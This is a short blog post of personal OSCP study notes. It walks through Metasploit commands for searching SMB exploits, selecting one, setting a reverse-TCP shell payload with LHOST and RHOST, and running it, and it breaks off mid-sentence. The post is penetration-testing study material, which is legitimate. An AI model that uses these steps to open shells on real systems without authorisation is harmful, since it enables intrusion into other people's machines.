Quick Metasploit Guide

These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Ensure PostgreSQL is running (Metasploit uses it as its database backend):

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP the victim host will connect back to (your Kali VM, for example):
msf> set LHOST 192.168.0.x

RHOST is the IP of the victim:
msf> set RHOST 192.168.1.x

The default RPORT is 80, but set a different one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If you are trying to get a remote shell and it looks like nothing is happening, you may already be sitting in the shell. Just try executing a command and see what happens:
